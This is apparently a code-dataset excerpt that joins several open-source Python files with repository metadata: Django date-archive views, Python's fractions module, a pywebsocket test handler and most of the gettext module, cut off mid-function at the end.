""" lookup_kwargs = self._make_single_date_lookup(date) qs = self.get_dated_queryset(**lookup_kwargs) return (None, qs, { 'day': date, 'previous_day': self.get_previous_day(date), 'next_day': self.get_next_day(date), 'previous_month': self.get_previous_month(date), 'next_month': self.get_next_month(date) }) class DayArchiveView(MultipleObjectTemplateResponseMixin, BaseDayArchiveView): """ List of objects published on a given day. """ template_name_suffix = "_archive_day" class BaseTodayArchiveView(BaseDayArchiveView): """ List of objects published today. """ def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ return self._get_dated_items(datetime.date.today()) class TodayArchiveView(MultipleObjectTemplateResponseMixin, BaseTodayArchiveView): """ List of objects published today. """ template_name_suffix = "_archive_day" class BaseDateDetailView(YearMixin, MonthMixin, DayMixin, DateMixin, BaseDetailView): """ Detail view of a single object on a single date; this differs from the standard DetailView by accepting a year/month/day in the URL. """ def get_object(self, queryset=None): """ Get the object this request displays. """ year = self.get_year() month = self.get_month() day = self.get_day() date = _date_from_string(year, self.get_year_format(), month, self.get_month_format(), day, self.get_day_format()) # Use a custom queryset if provided qs = self.get_queryset() if queryset is None else queryset if not self.get_allow_future() and date > datetime.date.today(): raise Http404(_( "Future %(verbose_name_plural)s not available because " "%(class_name)s.allow_future is False.") % { 'verbose_name_plural': qs.model._meta.verbose_name_plural, 'class_name': self.__class__.__name__, }, ) # Filter down a queryset from self.queryset using the date from the # URL. 
This'll get passed as the queryset to DetailView.get_object, # which'll handle the 404 lookup_kwargs = self._make_single_date_lookup(date) qs = qs.filter(**lookup_kwargs) return super(BaseDetailView, self).get_object(queryset=qs) class DateDetailView(SingleObjectTemplateResponseMixin, BaseDateDetailView): """ Detail view of a single object on a single date; this differs from the standard DetailView by accepting a year/month/day in the URL. """ template_name_suffix = '_detail' def _date_from_string(year, year_format, month='', month_format='', day='', day_format='', delim='__'): """ Helper: get a datetime.date object given a format string and a year, month, and day (only year is mandatory). Raise a 404 for an invalid date. """ format = delim.join((year_format, month_format, day_format)) datestr = delim.join((year, month, day)) try: return datetime.datetime.strptime(force_str(datestr), format).date() except ValueError: raise Http404(_("Invalid date string '%(datestr)s' given format '%(format)s'") % { 'datestr': datestr, 'format': format, }) def _get_next_prev(generic_view, date, is_previous, period): """ Helper: Get the next or the previous valid date. The idea is to allow links on month/day views to never be 404s by never providing a date that'll be invalid for the given view. This is a bit complicated since it handles different intervals of time, hence the coupling to generic_view. However in essence the logic comes down to: * If allow_empty and allow_future are both true, this is easy: just return the naive result (just the next/previous day/week/month, regardless of object existence.) * If allow_empty is true, allow_future is false, and the naive result isn't in the future, then return it; otherwise return None. * If allow_empty is false and allow_future is true, return the next date *that contains a valid object*, even if it's in the future. If there are no next objects, return None. 
* If allow_empty is false and allow_future is false, return the next date that contains a valid object. If that date is in the future, or if there are no next objects, return None. """ date_field = generic_view.get_date_field() allow_empty = generic_view.get_allow_empty() allow_future = generic_view.get_allow_future() get_current = getattr(generic_view, '_get_current_%s' % period) get_next = getattr(generic_view, '_get_next_%s' % period) # Bounds of the current interval start, end = get_current(date), get_next(date) # If allow_empty is True, the naive result will be valid if allow_empty: if is_previous: result = get_current(start - datetime.timedelta(days=1)) else: result = end if allow_future or result <= timezone_today(): return result else: return None # Otherwise, we'll need to go to the database to look for an object # whose date_field is at least (greater than/less than) the given # naive result else: # Construct a lookup and an ordering depending on whether we're doing # a previous date or a next date lookup. if is_previous: lookup = {'%s__lt' % date_field: generic_view._make_date_lookup_arg(start)} ordering = '-%s' % date_field else: lookup = {'%s__gte' % date_field: generic_view._make_date_lookup_arg(end)} ordering = date_field # Filter out objects in the future if appropriate. if not allow_future: # Fortunately, to match the implementation of allow_future, # we need __lte, which doesn't conflict with __lt above. if generic_view.uses_datetime_field: now = timezone.now() else: now = timezone_today() lookup['%s__lte' % date_field] = now qs = generic_view.get_queryset().filter(**lookup).order_by(ordering) # Snag the first object from the queryset; if it doesn't exist that # means there's no next/previous link available. try: result = getattr(qs[0], date_field) except IndexError: return None # Convert datetimes to dates in the current time zone. 
if generic_view.uses_datetime_field: if settings.USE_TZ: result = timezone.localtime(result) result = result.date() # Return the first day of the period. return get_current(result) def timezone_today(): """ Return the current date in the current time zone. """ if settings.USE_TZ: return timezone.localtime(timezone.now()).date() else: return datetime.date.today()
bsd-3-clause
gautamMalu/rootfs_xen_arndale
usr/lib/python3.4/fractions.py
722
23203
# Originally contributed by Sjoerd Mullender. # Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>. """Fraction, infinite-precision, real numbers.""" from decimal import Decimal import math import numbers import operator import re import sys __all__ = ['Fraction', 'gcd'] def gcd(a, b): """Calculate the Greatest Common Divisor of a and b. Unless b==0, the result will have the same sign as b (so that when b is divided by it, the result comes out positive). """ while b: a, b = b, a%b return a # Constants related to the hash implementation; hash(x) is based # on the reduction of x modulo the prime _PyHASH_MODULUS. _PyHASH_MODULUS = sys.hash_info.modulus # Value to be used for rationals that reduce to infinity modulo # _PyHASH_MODULUS. _PyHASH_INF = sys.hash_info.inf _RATIONAL_FORMAT = re.compile(r""" \A\s* # optional whitespace at the start, then (?P<sign>[-+]?) # an optional sign, then (?=\d|\.\d) # lookahead for digit or .digit (?P<num>\d*) # numerator (possibly empty) (?: # followed by (?:/(?P<denom>\d+))? # an optional denominator | # or (?:\.(?P<decimal>\d*))? # an optional fractional part (?:E(?P<exp>[-+]?\d+))? # and optional exponent ) \s*\Z # and optional whitespace to finish """, re.VERBOSE | re.IGNORECASE) class Fraction(numbers.Rational): """This class implements rational numbers. In the two-argument form of the constructor, Fraction(8, 6) will produce a rational number equivalent to 4/3. Both arguments must be Rational. The numerator defaults to 0 and the denominator defaults to 1 so that Fraction(3) == 3 and Fraction() == 0. Fractions can also be constructed from: - numeric strings similar to those accepted by the float constructor (for example, '-2.3' or '1e10') - strings of the form '123/456' - float and Decimal instances - other Rational instances (including integers) """ __slots__ = ('_numerator', '_denominator') # We're immutable, so use __new__ not __init__ def __new__(cls, numerator=0, denominator=None): """Constructs a Rational. 
Takes a string like '3/2' or '1.5', another Rational instance, a numerator/denominator pair, or a float. Examples -------- >>> Fraction(10, -8) Fraction(-5, 4) >>> Fraction(Fraction(1, 7), 5) Fraction(1, 35) >>> Fraction(Fraction(1, 7), Fraction(2, 3)) Fraction(3, 14) >>> Fraction('314') Fraction(314, 1) >>> Fraction('-35/4') Fraction(-35, 4) >>> Fraction('3.1415') # conversion from numeric string Fraction(6283, 2000) >>> Fraction('-47e-2') # string may include a decimal exponent Fraction(-47, 100) >>> Fraction(1.47) # direct construction from float (exact conversion) Fraction(6620291452234629, 4503599627370496) >>> Fraction(2.25) Fraction(9, 4) >>> Fraction(Decimal('1.47')) Fraction(147, 100) """ self = super(Fraction, cls).__new__(cls) if denominator is None: if isinstance(numerator, numbers.Rational): self._numerator = numerator.numerator self._denominator = numerator.denominator return self elif isinstance(numerator, float): # Exact conversion from float value = Fraction.from_float(numerator) self._numerator = value._numerator self._denominator = value._denominator return self elif isinstance(numerator, Decimal): value = Fraction.from_decimal(numerator) self._numerator = value._numerator self._denominator = value._denominator return self elif isinstance(numerator, str): # Handle construction from strings. 
m = _RATIONAL_FORMAT.match(numerator) if m is None: raise ValueError('Invalid literal for Fraction: %r' % numerator) numerator = int(m.group('num') or '0') denom = m.group('denom') if denom: denominator = int(denom) else: denominator = 1 decimal = m.group('decimal') if decimal: scale = 10**len(decimal) numerator = numerator * scale + int(decimal) denominator *= scale exp = m.group('exp') if exp: exp = int(exp) if exp >= 0: numerator *= 10**exp else: denominator *= 10**-exp if m.group('sign') == '-': numerator = -numerator else: raise TypeError("argument should be a string " "or a Rational instance") elif (isinstance(numerator, numbers.Rational) and isinstance(denominator, numbers.Rational)): numerator, denominator = ( numerator.numerator * denominator.denominator, denominator.numerator * numerator.denominator ) else: raise TypeError("both arguments should be " "Rational instances") if denominator == 0: raise ZeroDivisionError('Fraction(%s, 0)' % numerator) g = gcd(numerator, denominator) self._numerator = numerator // g self._denominator = denominator // g return self @classmethod def from_float(cls, f): """Converts a finite float to a rational number, exactly. Beware that Fraction.from_float(0.3) != Fraction(3, 10). """ if isinstance(f, numbers.Integral): return cls(f) elif not isinstance(f, float): raise TypeError("%s.from_float() only takes floats, not %r (%s)" % (cls.__name__, f, type(f).__name__)) if math.isnan(f): raise ValueError("Cannot convert %r to %s." % (f, cls.__name__)) if math.isinf(f): raise OverflowError("Cannot convert %r to %s." 
% (f, cls.__name__)) return cls(*f.as_integer_ratio()) @classmethod def from_decimal(cls, dec): """Converts a finite Decimal instance to a rational number, exactly.""" from decimal import Decimal if isinstance(dec, numbers.Integral): dec = Decimal(int(dec)) elif not isinstance(dec, Decimal): raise TypeError( "%s.from_decimal() only takes Decimals, not %r (%s)" % (cls.__name__, dec, type(dec).__name__)) if dec.is_infinite(): raise OverflowError( "Cannot convert %s to %s." % (dec, cls.__name__)) if dec.is_nan(): raise ValueError("Cannot convert %s to %s." % (dec, cls.__name__)) sign, digits, exp = dec.as_tuple() digits = int(''.join(map(str, digits))) if sign: digits = -digits if exp >= 0: return cls(digits * 10 ** exp) else: return cls(digits, 10 ** -exp) def limit_denominator(self, max_denominator=1000000): """Closest Fraction to self with denominator at most max_denominator. >>> Fraction('3.141592653589793').limit_denominator(10) Fraction(22, 7) >>> Fraction('3.141592653589793').limit_denominator(100) Fraction(311, 99) >>> Fraction(4321, 8765).limit_denominator(10000) Fraction(4321, 8765) """ # Algorithm notes: For any real number x, define a *best upper # approximation* to x to be a rational number p/q such that: # # (1) p/q >= x, and # (2) if p/q > r/s >= x then s > q, for any rational r/s. # # Define *best lower approximation* similarly. Then it can be # proved that a rational number is a best upper or lower # approximation to x if, and only if, it is a convergent or # semiconvergent of the (unique shortest) continued fraction # associated to x. # # To find a best rational approximation with denominator <= M, # we find the best upper and lower approximations with # denominator <= M and take whichever of these is closer to x. # In the event of a tie, the bound with smaller denominator is # chosen. 
If both denominators are equal (which can happen # only when max_denominator == 1 and self is midway between # two integers) the lower bound---i.e., the floor of self, is # taken. if max_denominator < 1: raise ValueError("max_denominator should be at least 1") if self._denominator <= max_denominator: return Fraction(self) p0, q0, p1, q1 = 0, 1, 1, 0 n, d = self._numerator, self._denominator while True: a = n//d q2 = q0+a*q1 if q2 > max_denominator: break p0, q0, p1, q1 = p1, q1, p0+a*p1, q2 n, d = d, n-a*d k = (max_denominator-q0)//q1 bound1 = Fraction(p0+k*p1, q0+k*q1) bound2 = Fraction(p1, q1) if abs(bound2 - self) <= abs(bound1-self): return bound2 else: return bound1 @property def numerator(a): return a._numerator @property def denominator(a): return a._denominator def __repr__(self): """repr(self)""" return ('Fraction(%s, %s)' % (self._numerator, self._denominator)) def __str__(self): """str(self)""" if self._denominator == 1: return str(self._numerator) else: return '%s/%s' % (self._numerator, self._denominator) def _operator_fallbacks(monomorphic_operator, fallback_operator): """Generates forward and reverse operators given a purely-rational operator and a function from the operator module. Use this like: __op__, __rop__ = _operator_fallbacks(just_rational_op, operator.op) In general, we want to implement the arithmetic operations so that mixed-mode operations either call an implementation whose author knew about the types of both arguments, or convert both to the nearest built in type and do the operation there. In Fraction, that means that we define __add__ and __radd__ as: def __add__(self, other): # Both types have numerators/denominator attributes, # so do the operation directly if isinstance(other, (int, Fraction)): return Fraction(self.numerator * other.denominator + other.numerator * self.denominator, self.denominator * other.denominator) # float and complex don't have those operations, but we # know about those types, so special case them. 
elif isinstance(other, float): return float(self) + other elif isinstance(other, complex): return complex(self) + other # Let the other type take over. return NotImplemented def __radd__(self, other): # radd handles more types than add because there's # nothing left to fall back to. if isinstance(other, numbers.Rational): return Fraction(self.numerator * other.denominator + other.numerator * self.denominator, self.denominator * other.denominator) elif isinstance(other, Real): return float(other) + float(self) elif isinstance(other, Complex): return complex(other) + complex(self) return NotImplemented There are 5 different cases for a mixed-type addition on Fraction. I'll refer to all of the above code that doesn't refer to Fraction, float, or complex as "boilerplate". 'r' will be an instance of Fraction, which is a subtype of Rational (r : Fraction <: Rational), and b : B <: Complex. The first three involve 'r + b': 1. If B <: Fraction, int, float, or complex, we handle that specially, and all is well. 2. If Fraction falls back to the boilerplate code, and it were to return a value from __add__, we'd miss the possibility that B defines a more intelligent __radd__, so the boilerplate should return NotImplemented from __add__. In particular, we don't handle Rational here, even though we could get an exact answer, in case the other type wants to do something special. 3. If B <: Fraction, Python tries B.__radd__ before Fraction.__add__. This is ok, because it was implemented with knowledge of Fraction, so it can handle those instances before delegating to Real or Complex. The next two situations describe 'b + r'. We assume that b didn't know about Fraction in its implementation, and that it uses similar boilerplate code: 4. If B <: Rational, then __radd_ converts both to the builtin rational type (hey look, that's us) and proceeds. 5. Otherwise, __radd__ tries to find the nearest common base ABC, and fall back to its builtin type. 
Since this class doesn't subclass a concrete type, there's no implementation to fall back to, so we need to try as hard as possible to return an actual value, or the user will get a TypeError. """ def forward(a, b): if isinstance(b, (int, Fraction)): return monomorphic_operator(a, b) elif isinstance(b, float): return fallback_operator(float(a), b) elif isinstance(b, complex): return fallback_operator(complex(a), b) else: return NotImplemented forward.__name__ = '__' + fallback_operator.__name__ + '__' forward.__doc__ = monomorphic_operator.__doc__ def reverse(b, a): if isinstance(a, numbers.Rational): # Includes ints. return monomorphic_operator(a, b) elif isinstance(a, numbers.Real): return fallback_operator(float(a), float(b)) elif isinstance(a, numbers.Complex): return fallback_operator(complex(a), complex(b)) else: return NotImplemented reverse.__name__ = '__r' + fallback_operator.__name__ + '__' reverse.__doc__ = monomorphic_operator.__doc__ return forward, reverse def _add(a, b): """a + b""" return Fraction(a.numerator * b.denominator + b.numerator * a.denominator, a.denominator * b.denominator) __add__, __radd__ = _operator_fallbacks(_add, operator.add) def _sub(a, b): """a - b""" return Fraction(a.numerator * b.denominator - b.numerator * a.denominator, a.denominator * b.denominator) __sub__, __rsub__ = _operator_fallbacks(_sub, operator.sub) def _mul(a, b): """a * b""" return Fraction(a.numerator * b.numerator, a.denominator * b.denominator) __mul__, __rmul__ = _operator_fallbacks(_mul, operator.mul) def _div(a, b): """a / b""" return Fraction(a.numerator * b.denominator, a.denominator * b.numerator) __truediv__, __rtruediv__ = _operator_fallbacks(_div, operator.truediv) def __floordiv__(a, b): """a // b""" return math.floor(a / b) def __rfloordiv__(b, a): """a // b""" return math.floor(a / b) def __mod__(a, b): """a % b""" div = a // b return a - b * div def __rmod__(b, a): """a % b""" div = a // b return a - b * div def __pow__(a, b): """a ** b If b is 
not an integer, the result will be a float or complex since roots are generally irrational. If b is an integer, the result will be rational. """ if isinstance(b, numbers.Rational): if b.denominator == 1: power = b.numerator if power >= 0: return Fraction(a._numerator ** power, a._denominator ** power) else: return Fraction(a._denominator ** -power, a._numerator ** -power) else: # A fractional power will generally produce an # irrational number. return float(a) ** float(b) else: return float(a) ** b def __rpow__(b, a): """a ** b""" if b._denominator == 1 and b._numerator >= 0: # If a is an int, keep it that way if possible. return a ** b._numerator if isinstance(a, numbers.Rational): return Fraction(a.numerator, a.denominator) ** b if b._denominator == 1: return a ** b._numerator return a ** float(b) def __pos__(a): """+a: Coerces a subclass instance to Fraction""" return Fraction(a._numerator, a._denominator) def __neg__(a): """-a""" return Fraction(-a._numerator, a._denominator) def __abs__(a): """abs(a)""" return Fraction(abs(a._numerator), a._denominator) def __trunc__(a): """trunc(a)""" if a._numerator < 0: return -(-a._numerator // a._denominator) else: return a._numerator // a._denominator def __floor__(a): """Will be math.floor(a) in 3.0.""" return a.numerator // a.denominator def __ceil__(a): """Will be math.ceil(a) in 3.0.""" # The negations cleverly convince floordiv to return the ceiling. return -(-a.numerator // a.denominator) def __round__(self, ndigits=None): """Will be round(self, ndigits) in 3.0. Rounds half toward even. """ if ndigits is None: floor, remainder = divmod(self.numerator, self.denominator) if remainder * 2 < self.denominator: return floor elif remainder * 2 > self.denominator: return floor + 1 # Deal with the half case: elif floor % 2 == 0: return floor else: return floor + 1 shift = 10**abs(ndigits) # See _operator_fallbacks.forward to check that the results of # these operations will always be Fraction and therefore have # round(). 
if ndigits > 0: return Fraction(round(self * shift), shift) else: return Fraction(round(self / shift) * shift) def __hash__(self): """hash(self)""" # XXX since this method is expensive, consider caching the result # In order to make sure that the hash of a Fraction agrees # with the hash of a numerically equal integer, float or # Decimal instance, we follow the rules for numeric hashes # outlined in the documentation. (See library docs, 'Built-in # Types'). # dinv is the inverse of self._denominator modulo the prime # _PyHASH_MODULUS, or 0 if self._denominator is divisible by # _PyHASH_MODULUS. dinv = pow(self._denominator, _PyHASH_MODULUS - 2, _PyHASH_MODULUS) if not dinv: hash_ = _PyHASH_INF else: hash_ = abs(self._numerator) * dinv % _PyHASH_MODULUS result = hash_ if self >= 0 else -hash_ return -2 if result == -1 else result def __eq__(a, b): """a == b""" if isinstance(b, numbers.Rational): return (a._numerator == b.numerator and a._denominator == b.denominator) if isinstance(b, numbers.Complex) and b.imag == 0: b = b.real if isinstance(b, float): if math.isnan(b) or math.isinf(b): # comparisons with an infinity or nan should behave in # the same way for any finite a, so treat a as zero. return 0.0 == b else: return a == a.from_float(b) else: # Since a doesn't know how to compare with b, let's give b # a chance to compare itself with a. return NotImplemented def _richcmp(self, other, op): """Helper for comparison operators, for internal use only. Implement comparison between a Rational instance `self`, and either another Rational instance or a float `other`. If `other` is not a Rational instance or a float, return NotImplemented. `op` should be one of the six standard comparison operators. """ # convert other to a Rational instance where reasonable. 
if isinstance(other, numbers.Rational): return op(self._numerator * other.denominator, self._denominator * other.numerator) if isinstance(other, float): if math.isnan(other) or math.isinf(other): return op(0.0, other) else: return op(self, self.from_float(other)) else: return NotImplemented def __lt__(a, b): """a < b""" return a._richcmp(b, operator.lt) def __gt__(a, b): """a > b""" return a._richcmp(b, operator.gt) def __le__(a, b): """a <= b""" return a._richcmp(b, operator.le) def __ge__(a, b): """a >= b""" return a._richcmp(b, operator.ge) def __bool__(a): """a != 0""" return a._numerator != 0 # support for pickling, copy, and deepcopy def __reduce__(self): return (self.__class__, (str(self),)) def __copy__(self): if type(self) == Fraction: return self # I'm immutable; therefore I am my own clone return self.__class__(self._numerator, self._denominator) def __deepcopy__(self, memo): if type(self) == Fraction: return self # My components are also immutable return self.__class__(self._numerator, self._denominator)
gpl-2.0
Sendoushi/servo
tests/wpt/web-platform-tests/tools/pywebsocket/src/test/testdata/handlers/sub/wrong_handshake_sig_wsh.py
499
1859
# Copyright 2009, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Wrong web_socket_do_extra_handshake signature. """ def no_web_socket_do_extra_handshake(request): pass def web_socket_transfer_data(request): request.connection.write( 'sub/wrong_handshake_sig_wsh.py is called for %s, %s' % (request.ws_resource, request.ws_protocol)) # vi:sts=4 sw=4 et
mpl-2.0
weimingtom/python-for-android
python3-alpha/python3-src/Lib/gettext.py
50
17656
"""Internationalization and localization support. This module provides internationalization (I18N) and localization (L10N) support for your Python programs by providing an interface to the GNU gettext message catalog library. I18N refers to the operation by which a program is made aware of multiple languages. L10N refers to the adaptation of your program, once internationalized, to the local language and cultural habits. """ # This module represents the integration of work, contributions, feedback, and # suggestions from the following people: # # Martin von Loewis, who wrote the initial implementation of the underlying # C-based libintlmodule (later renamed _gettext), along with a skeletal # gettext.py implementation. # # Peter Funk, who wrote fintl.py, a fairly complete wrapper around intlmodule, # which also included a pure-Python implementation to read .mo files if # intlmodule wasn't available. # # James Henstridge, who also wrote a gettext.py module, which has some # interesting, but currently unsupported experimental features: the notion of # a Catalog class and instances, and the ability to add to a catalog file via # a Python API. # # Barry Warsaw integrated these modules, wrote the .install() API and code, # and conformed all C and Python code to Python's coding standards. # # Francois Pinard and Marc-Andre Lemburg also contributed valuably to this # module. # # J. David Ibanez implemented plural forms. Bruno Haible fixed some bugs. # # TODO: # - Lazy loading of .mo files. Currently the entire catalog is loaded into # memory, but that's probably bad for large translated programs. Instead, # the lexical sort of original strings in GNU .mo files should be exploited # to do binary searches and lazy initializations. Or you might want to use # the undocumented double-hash algorithm for .mo files with hash tables, but # you'll need to study the GNU gettext code to do this. # # - Support Solaris .mo file formats. 
Unfortunately, we've been unable to # find this format documented anywhere. import locale, copy, io, os, re, struct, sys from errno import ENOENT __all__ = ['NullTranslations', 'GNUTranslations', 'Catalog', 'find', 'translation', 'install', 'textdomain', 'bindtextdomain', 'dgettext', 'dngettext', 'gettext', 'ngettext', ] _default_localedir = os.path.join(sys.prefix, 'share', 'locale') def c2py(plural): """Gets a C expression as used in PO files for plural forms and returns a Python lambda function that implements an equivalent expression. """ # Security check, allow only the "n" identifier import token, tokenize tokens = tokenize.generate_tokens(io.StringIO(plural).readline) try: danger = [x for x in tokens if x[0] == token.NAME and x[1] != 'n'] except tokenize.TokenError: raise ValueError('plural forms expression error, maybe unbalanced parenthesis') else: if danger: raise ValueError('plural forms expression could be dangerous') # Replace some C operators by their Python equivalents plural = plural.replace('&&', ' and ') plural = plural.replace('||', ' or ') expr = re.compile(r'\!([^=])') plural = expr.sub(' not \\1', plural) # Regular expression and replacement function used to transform # "a?b:c" to "b if a else c". expr = re.compile(r'(.*?)\?(.*?):(.*)') def repl(x): return "(%s if %s else %s)" % (x.group(2), x.group(1), expr.sub(repl, x.group(3))) # Code to transform the plural expression, taking care of parentheses stack = [''] for c in plural: if c == '(': stack.append('') elif c == ')': if len(stack) == 1: # Actually, we never reach this code, because unbalanced # parentheses get caught in the security check at the # beginning. 
raise ValueError('unbalanced parenthesis in plural form') s = expr.sub(repl, stack.pop()) stack[-1] += '(%s)' % s else: stack[-1] += c plural = expr.sub(repl, stack.pop()) return eval('lambda n: int(%s)' % plural) def _expand_lang(loc): loc = locale.normalize(loc) COMPONENT_CODESET = 1 << 0 COMPONENT_TERRITORY = 1 << 1 COMPONENT_MODIFIER = 1 << 2 # split up the locale into its base components mask = 0 pos = loc.find('@') if pos >= 0: modifier = loc[pos:] loc = loc[:pos] mask |= COMPONENT_MODIFIER else: modifier = '' pos = loc.find('.') if pos >= 0: codeset = loc[pos:] loc = loc[:pos] mask |= COMPONENT_CODESET else: codeset = '' pos = loc.find('_') if pos >= 0: territory = loc[pos:] loc = loc[:pos] mask |= COMPONENT_TERRITORY else: territory = '' language = loc ret = [] for i in range(mask+1): if not (i & ~mask): # if all components for this combo exist ... val = language if i & COMPONENT_TERRITORY: val += territory if i & COMPONENT_CODESET: val += codeset if i & COMPONENT_MODIFIER: val += modifier ret.append(val) ret.reverse() return ret class NullTranslations: def __init__(self, fp=None): self._info = {} self._charset = None self._output_charset = None self._fallback = None if fp is not None: self._parse(fp) def _parse(self, fp): pass def add_fallback(self, fallback): if self._fallback: self._fallback.add_fallback(fallback) else: self._fallback = fallback def gettext(self, message): if self._fallback: return self._fallback.gettext(message) return message def lgettext(self, message): if self._fallback: return self._fallback.lgettext(message) return message def ngettext(self, msgid1, msgid2, n): if self._fallback: return self._fallback.ngettext(msgid1, msgid2, n) if n == 1: return msgid1 else: return msgid2 def lngettext(self, msgid1, msgid2, n): if self._fallback: return self._fallback.lngettext(msgid1, msgid2, n) if n == 1: return msgid1 else: return msgid2 def info(self): return self._info def charset(self): return self._charset def output_charset(self): return 
self._output_charset def set_output_charset(self, charset): self._output_charset = charset def install(self, names=None): import builtins builtins.__dict__['_'] = self.gettext if hasattr(names, "__contains__"): if "gettext" in names: builtins.__dict__['gettext'] = builtins.__dict__['_'] if "ngettext" in names: builtins.__dict__['ngettext'] = self.ngettext if "lgettext" in names: builtins.__dict__['lgettext'] = self.lgettext if "lngettext" in names: builtins.__dict__['lngettext'] = self.lngettext class GNUTranslations(NullTranslations): # Magic number of .mo files LE_MAGIC = 0x950412de BE_MAGIC = 0xde120495 def _parse(self, fp): """Override this method to support alternative .mo formats.""" unpack = struct.unpack filename = getattr(fp, 'name', '') # Parse the .mo file header, which consists of 5 little endian 32 # bit words. self._catalog = catalog = {} self.plural = lambda n: int(n != 1) # germanic plural by default buf = fp.read() buflen = len(buf) # Are we big endian or little endian? magic = unpack('<I', buf[:4])[0] if magic == self.LE_MAGIC: version, msgcount, masteridx, transidx = unpack('<4I', buf[4:20]) ii = '<II' elif magic == self.BE_MAGIC: version, msgcount, masteridx, transidx = unpack('>4I', buf[4:20]) ii = '>II' else: raise IOError(0, 'Bad magic number', filename) # Now put all messages from the .mo file buffer into the catalog # dictionary. 
for i in range(0, msgcount): mlen, moff = unpack(ii, buf[masteridx:masteridx+8]) mend = moff + mlen tlen, toff = unpack(ii, buf[transidx:transidx+8]) tend = toff + tlen if mend < buflen and tend < buflen: msg = buf[moff:mend] tmsg = buf[toff:tend] else: raise IOError(0, 'File is corrupt', filename) # See if we're looking at GNU .mo conventions for metadata if mlen == 0: # Catalog description lastk = k = None for b_item in tmsg.split('\n'.encode("ascii")): item = b_item.decode().strip() if not item: continue if ':' in item: k, v = item.split(':', 1) k = k.strip().lower() v = v.strip() self._info[k] = v lastk = k elif lastk: self._info[lastk] += '\n' + item if k == 'content-type': self._charset = v.split('charset=')[1] elif k == 'plural-forms': v = v.split(';') plural = v[1].split('plural=')[1] self.plural = c2py(plural) # Note: we unconditionally convert both msgids and msgstrs to # Unicode using the character encoding specified in the charset # parameter of the Content-Type header. The gettext documentation # strongly encourages msgids to be us-ascii, but some applications # require alternative encodings (e.g. Zope's ZCML and ZPT). For # traditional gettext applications, the msgid conversion will # cause no problems since us-ascii should always be a subset of # the charset encoding. We may want to fall back to 8-bit msgids # if the Unicode conversion fails. 
charset = self._charset or 'ascii' if b'\x00' in msg: # Plural forms msgid1, msgid2 = msg.split(b'\x00') tmsg = tmsg.split(b'\x00') msgid1 = str(msgid1, charset) for i, x in enumerate(tmsg): catalog[(msgid1, i)] = str(x, charset) else: catalog[str(msg, charset)] = str(tmsg, charset) # advance to next entry in the seek tables masteridx += 8 transidx += 8 def lgettext(self, message): missing = object() tmsg = self._catalog.get(message, missing) if tmsg is missing: if self._fallback: return self._fallback.lgettext(message) return message if self._output_charset: return tmsg.encode(self._output_charset) return tmsg.encode(locale.getpreferredencoding()) def lngettext(self, msgid1, msgid2, n): try: tmsg = self._catalog[(msgid1, self.plural(n))] if self._output_charset: return tmsg.encode(self._output_charset) return tmsg.encode(locale.getpreferredencoding()) except KeyError: if self._fallback: return self._fallback.lngettext(msgid1, msgid2, n) if n == 1: return msgid1 else: return msgid2 def gettext(self, message): missing = object() tmsg = self._catalog.get(message, missing) if tmsg is missing: if self._fallback: return self._fallback.gettext(message) return message return tmsg def ngettext(self, msgid1, msgid2, n): try: tmsg = self._catalog[(msgid1, self.plural(n))] except KeyError: if self._fallback: return self._fallback.ngettext(msgid1, msgid2, n) if n == 1: tmsg = msgid1 else: tmsg = msgid2 return tmsg # Locate a .mo file using the gettext strategy def find(domain, localedir=None, languages=None, all=False): # Get some reasonable defaults for arguments that were not supplied if localedir is None: localedir = _default_localedir if languages is None: languages = [] for envar in ('LANGUAGE', 'LC_ALL', 'LC_MESSAGES', 'LANG'): val = os.environ.get(envar) if val: languages = val.split(':') break if 'C' not in languages: languages.append('C') # now normalize and expand the languages nelangs = [] for lang in languages: for nelang in _expand_lang(lang): if nelang not in 
nelangs: nelangs.append(nelang) # select a language if all: result = [] else: result = None for lang in nelangs: if lang == 'C': break mofile = os.path.join(localedir, lang, 'LC_MESSAGES', '%s.mo' % domain) if os.path.exists(mofile): if all: result.append(mofile) else: return mofile return result # a mapping between absolute .mo file path and Translation object _translations = {} def translation(domain, localedir=None, languages=None, class_=None, fallback=False, codeset=None): if class_ is None: class_ = GNUTranslations mofiles = find(domain, localedir, languages, all=True) if not mofiles: if fallback: return NullTranslations() raise IOError(ENOENT, 'No translation file found for domain', domain) # Avoid opening, reading, and parsing the .mo file after it's been done # once. result = None for mofile in mofiles: key = (class_, os.path.abspath(mofile)) t = _translations.get(key) if t is None: with open(mofile, 'rb') as fp: t = _translations.setdefault(key, class_(fp)) # Copy the translation object to allow setting fallbacks and # output charset. All other instance data is shared with the # cached object. 
